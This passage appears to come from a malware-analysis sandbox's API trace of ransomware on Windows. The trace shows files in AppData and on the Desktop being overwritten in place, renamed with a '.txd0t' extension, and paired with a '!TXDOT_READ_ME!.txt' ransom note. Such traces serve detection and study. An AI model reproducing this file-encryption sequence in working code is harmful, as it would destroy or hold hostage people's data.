returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t" [0072.347] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t") returned 0 [0072.347] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png", dwFileAttributes=0x80) returned 1 [0072.347] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n5hrh8hkx hrtd-9n.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.347] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=37252) returned 1 [0072.347] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.347] WriteFile (in: hFile=0x468, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.348] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff6c7c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.348] ReadFile (in: hFile=0x468, lpBuffer=0x380d020, nNumberOfBytesToRead=0x9180, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f650*=0x9180, lpOverlapped=0x0) returned 1 [0072.457] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff6e80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.457] WriteFile (in: hFile=0x468, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x9180, lpNumberOfBytesWritten=0x414f654, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f654*=0x9180, lpOverlapped=0x0) returned 1 [0072.457] FlushFileBuffers (hFile=0x468) returned 1 [0072.471] GetProcessHeap () returned 0xe30000 [0072.471] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x11c) returned 0xe9b648 [0072.471] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" [0072.471] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png") returned="n5hRh8HkX hRtD-9n.png" [0072.471] StrCpyW (in: psz1=0xe9b690, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.471] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.471] GetProcessHeap () returned 0xe30000 [0072.471] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0072.471] CloseHandle (hObject=0x468) returned 1 [0072.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n5hrh8hkx hrtd-9n.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\n5hrh8hkx hrtd-9n.png.txd0t")) returned 1 [0072.474] SetEvent (hEvent=0x404) returned 1 [0072.474] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.483] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" [0072.483] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t" [0072.484] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t") returned 0 [0072.485] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png", dwFileAttributes=0x80) returned 1 [0072.485] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pmtil.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0072.485] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=80496) returned 1 [0072.485] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.485] WriteFile (in: hFile=0x474, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.485] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffec390, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.486] ReadFile (in: hFile=0x474, lpBuffer=0x380d020, nNumberOfBytesToRead=0x13a70, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x13a70, lpOverlapped=0x0) returned 1 [0072.487] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffec590, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.487] WriteFile (in: hFile=0x474, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x13a70, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x13a70, lpOverlapped=0x0) returned 1 [0072.487] FlushFileBuffers (hFile=0x474) returned 1 [0072.500] GetProcessHeap () returned 0xe30000 [0072.500] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0072.500] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" [0072.500] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png") returned="pMTil.png" [0072.500] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.500] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.501] GetProcessHeap () returned 0xe30000 [0072.501] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.501] CloseHandle (hObject=0x474) returned 1 [0072.503] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pmtil.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\pMTil.png.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\pmtil.png.txd0t")) returned 1 [0072.503] SetEvent (hEvent=0x404) returned 1 [0072.503] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.514] StrCpyW (in: psz1=0x414f6a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" [0072.514] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t" [0072.515] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t") returned 0 [0072.515] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp", dwFileAttributes=0x80) returned 1 [0072.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sksjahk4avl.odp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.515] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=7207) returned 1 [0072.515] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.515] WriteFile (in: hFile=0x468, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.515] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffe1d9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.515] ReadFile (in: hFile=0x468, lpBuffer=0x380d020, nNumberOfBytesToRead=0x1c20, lpNumberOfBytesRead=0x414f660, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f660*=0x1c20, lpOverlapped=0x0) returned 1 [0072.516] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffffe3e0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.516] WriteFile (in: hFile=0x468, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x1c20, lpNumberOfBytesWritten=0x414f664, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f664*=0x1c20, lpOverlapped=0x0) returned 1 [0072.516] FlushFileBuffers (hFile=0x468) returned 1 [0072.526] GetProcessHeap () returned 0xe30000 [0072.526] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xe41328 [0072.527] StrCpyW (in: psz1=0xe41328, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" [0072.527] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp") returned="SKsJaHK4avL.odp" [0072.527] StrCpyW (in: psz1=0xe41370, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.527] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.527] GetProcessHeap () returned 0xe30000 [0072.527] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe41328 | out: hHeap=0xe30000) returned 1 [0072.527] CloseHandle (hObject=0x468) returned 1 [0072.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sksjahk4avl.odp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\SKsJaHK4avL.odp.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\sksjahk4avl.odp.txd0t")) returned 1 [0072.528] SetEvent (hEvent=0x404) returned 1 [0072.528] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.529] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" [0072.529] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t" [0072.530] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t") returned 0 [0072.530] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp", dwFileAttributes=0x80) returned 1 [0072.530] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u6xvu g.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.530] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=93689) returned 1 [0072.530] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.530] WriteFile (in: hFile=0x468, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.530] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9007, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.530] ReadFile (in: hFile=0x468, lpBuffer=0x380d020, nNumberOfBytesToRead=0x16df0, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x16df0, lpOverlapped=0x0) returned 1 [0072.532] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9210, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.532] WriteFile (in: hFile=0x468, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x16df0, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x16df0, lpOverlapped=0x0) returned 1 [0072.533] FlushFileBuffers (hFile=0x468) returned 1 [0072.544] GetProcessHeap () returned 0xe30000 [0072.544] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x106) returned 0xe9d750 [0072.544] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" [0072.544] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp") returned="U6XvU G.bmp" [0072.544] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.545] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.545] GetProcessHeap () returned 0xe30000 [0072.545] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.545] CloseHandle (hObject=0x468) returned 1 [0072.547] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u6xvu g.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\U6XvU G.bmp.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\u6xvu g.bmp.txd0t")) returned 1 [0072.548] SetEvent (hEvent=0x404) returned 1 [0072.548] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.550] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" [0072.550] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t" [0072.550] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t") returned 0 [0072.550] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png", dwFileAttributes=0x80) returned 1 [0072.550] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ubqsl.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0072.550] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=90511) returned 1 [0072.551] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.551] WriteFile (in: hFile=0x468, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.551] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9c71, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.551] ReadFile (in: hFile=0x468, lpBuffer=0x380d020, nNumberOfBytesToRead=0x16180, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x16180, lpOverlapped=0x0) returned 1 [0072.553] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe9e80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.553] WriteFile (in: hFile=0x468, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x16180, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x16180, lpOverlapped=0x0) returned 1 [0072.553] FlushFileBuffers (hFile=0x468) returned 1 [0072.557] GetProcessHeap () returned 0xe30000 [0072.557] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0072.557] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" [0072.557] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png") returned="uBqsl.png" [0072.557] StrCpyW (in: psz1=0xe9d798, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.557] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\!TXDOT_READ_ME!.txt") returned 1 [0072.558] GetProcessHeap () returned 0xe30000 [0072.558] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0072.558] CloseHandle (hObject=0x468) returned 1 [0072.563] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ubqsl.png"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\uBqsl.png.txd0t" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\ubqsl.png.txd0t")) returned 1 [0072.563] SetEvent (hEvent=0x404) returned 1 [0072.563] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.731] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" [0072.731] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t" [0072.731] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t") returned 0 [0072.731] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3", dwFileAttributes=0x80) returned 1 [0072.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\bbezntec-7.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0072.732] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=37514) returned 1 [0072.732] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.732] WriteFile (in: hFile=0x460, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.732] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff6b76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.732] ReadFile (in: hFile=0x460, lpBuffer=0x380d020, nNumberOfBytesToRead=0x9280, lpNumberOfBytesRead=0x414f670, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesRead=0x414f670*=0x9280, lpOverlapped=0x0) returned 1 [0072.733] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffff6d80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.733] WriteFile (in: hFile=0x460, lpBuffer=0x380d020*, nNumberOfBytesToWrite=0x9280, lpNumberOfBytesWritten=0x414f674, lpOverlapped=0x0 | out: lpBuffer=0x380d020*, lpNumberOfBytesWritten=0x414f674*=0x9280, lpOverlapped=0x0) returned 1 [0072.733] FlushFileBuffers (hFile=0x460) returned 1 [0072.735] GetProcessHeap () returned 0xe30000 [0072.735] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0xfc) returned 0xecf5a0 [0072.736] StrCpyW (in: psz1=0xecf5a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" [0072.736] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3") returned="BBeZnteC-7.mp3" [0072.736] StrCpyW (in: psz1=0xecf5d8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0072.736] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\!TXDOT_READ_ME!.txt") returned 1 [0072.736] GetProcessHeap () returned 0xe30000 [0072.736] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecf5a0 | out: hHeap=0xe30000) returned 1 [0072.736] CloseHandle (hObject=0x460) returned 1 [0072.737] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3" (normalized: "c:\\users\\fd1hvy\\desktop\\bbezntec-7.mp3"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t" (normalized: "c:\\users\\fd1hvy\\desktop\\bbezntec-7.mp3.txd0t")) returned 1 [0072.738] SetEvent (hEvent=0x404) returned 1 [0072.738] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.809] StrCpyW (in: psz1=0x414f6b0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" [0072.809] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t" [0072.809] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t") returned 0 [0072.809] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp", dwFileAttributes=0x80) returned 1 [0072.810] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp" (normalized: 